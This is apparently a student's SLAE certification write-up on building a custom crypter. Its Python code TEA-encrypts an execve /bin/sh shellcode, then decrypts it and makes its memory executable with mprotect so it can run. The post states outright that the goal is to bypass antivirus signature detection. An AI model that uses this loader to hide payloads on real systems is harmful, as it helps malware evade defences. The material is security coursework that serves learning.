Assignment #7 - Custom crypter

Student ID: PA-7854

The assignment indications are as follows:

  • Create a custom crypter
  • Feel free to use any existing encryption schema
  • Using any programming language

The code is available at my github repo.


Sometimes encryption is helpful to bypass fingerprint/signature antivirus mechanisms. It can also defeat users when trying to disassemble too, as it appears as gibberish.

There are a few block ciphers we can use, but to keep things easy, I picked up the Tiny Encryption Algorithm. As written in the properties section in previous link, this cipher has a few weaknesses, so it is being used here only as part of an example, but not for a real use case.

Having said that, let’s start.


We are going to use the previous execve-stack shellcode, which runs /bin/sh:


Instead of reinventing the wheel and writing my own script from scratch, I have found a lot of implementations of TEA (Tiny Encryption Algorithm), which i can use for this task, I implement it by using the PyTEA, a Python library.

key = b'slaeisthebest!!!'
tea = TEA(key)
shellcode_data  = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
encrypted = tea.encrypt(shellcode_data)
print('Encrypted hex:', encrypted.hex())
print('Decrypting and running...')
decrypted = tea.decrypt(encrypted)

shellcode = ctypes.create_string_buffer(bytes(decrypted))
function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))

addr = ctypes.cast(function, ctypes.c_void_p).value
libc = ctypes.CDLL('')
pagesize = libc.getpagesize()
addr_page = (addr // pagesize) * pagesize
for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
        assert libc.mprotect(page_start, pagesize, 0x7) == 0


We simply encrypt by using the key slaeisthebest!!! and print it on screen. Then we just decrypt and run the shellcode in a memory segment which there are executable permissions.

That’s all the certification requirements and thanks for having the time to read this further :).

SLAEx64 coming soon ;)